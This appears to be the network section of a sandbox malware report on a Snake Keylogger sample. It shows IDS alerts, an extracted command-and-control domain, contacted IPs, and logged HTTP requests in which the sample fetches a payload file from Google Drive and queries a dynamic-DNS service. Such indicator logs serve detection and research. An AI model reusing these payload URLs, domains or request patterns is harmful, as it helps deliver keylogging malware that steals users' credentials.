                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49826 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49837 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49787 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49775 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49859 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49892 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49762 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49802 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49857 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49799 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49839 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49878 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49847 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49900 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49890 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49879 -> 172.217.18.110:443
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00AE550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7i4MQtD9Ake8Wr9tEyyzKob5HgInf11gkcX8rtRC9q6QwrsjCZgMvIS1LlO2jdfQjeContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HvIfQy8YkY4HDxDIZggC9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL; expires=Tue, 01-Jul-2025 10:25:30 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6j55qK_y6oQQV458QiXo80s2gdu4r-lYkJHRlTVUYK3rhSviOGeuHNQw4jgxA-gGnWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-zo98B5bG0X0E5uvAstvLog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5-FOXmNKMuQEefk0lV_xggA8s9UjUUHEo_C9hOJS_9396nxRl9GegUTMP-jElXBcPcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HC3X_SlqlQs-glgBXh25Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wFw-YHUbq0Ewck829n3g8QC_MvvBjv4Sq0MYzpytkfBfedxnu7iSt4vGiAvYKhitoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-aGM57mpJXpkSbjuhrfRPHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT; expires=Tue, 01-Jul-2025 10:25:32 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5aEUTcnEip1TUte8B_tHQA0KCILInPpzVd_1xK7cgwoXsSLKf-hOpyichF4Pj20TlY8pNWTkgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-ocyzaAViPKhFnLXPxEOjnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6n9RrkdfXLy-3tZCG04DKjEUv5EEk-7_VYA9oMVMZ8ybZSgUHfTAErIaRUzrJoLDL1AsduCnIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-UECtAfVREZOMr9Xn0W_v0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4RftOGOtjsk7viJeMqoRS6gk8BUHgvfG7UV8-E2cnQ9apP_KnrvZ1lPwX_DWj1Id0Ww-eMjLQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-MBY9hWYplAAUay8gls1nnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7IiSH-ZFQOfXH-hdLXVvGFZ1cZ7K_xQhoseuivSPzoJKXADovJ2aFVOdemTaDbO5bLjAivpWcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gC_pOnxkBAu0myri0oVNqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4us8661zgyagbC0mWLIzOODq9Rnn2OfJppFtOYC4Cmq4e0A_bOYITLxUi_2_7rLuwTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-X6gpngfE8rqYpFEXyynOUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kgc9wJ9U2CL61VRVan6sB3ulNEmlb1V0LsEdY_12fOLR3goH7TxYzqaxis1KdesDVZg_RsksContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xrzBVyYDrSGlJ749Z-dM7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Svs1IQ44jLrISH8rJb7s8T4SlZWS-R13PXjaDXoCTOyaagM4RiCqx_muH0LCereMyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-T-slwck-Ot-b1gTI18XrUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Bb3yM0F_BDOWSWHoUUjLfu9CJc5F4JIuIh4s1rr5LP0qgyB5hNw88zrYY3RxDOD8Yx45XDzQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-wMNjJcf-m0qZ0W7xeAzIiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zQYTN8bv2zJTprVi6ZRzNdSwpBHX1NGA7GxtypyeKnfxWC32nG54grfxMVlAdad45Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-IfCEVruc-be_nQ8kd-CYNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
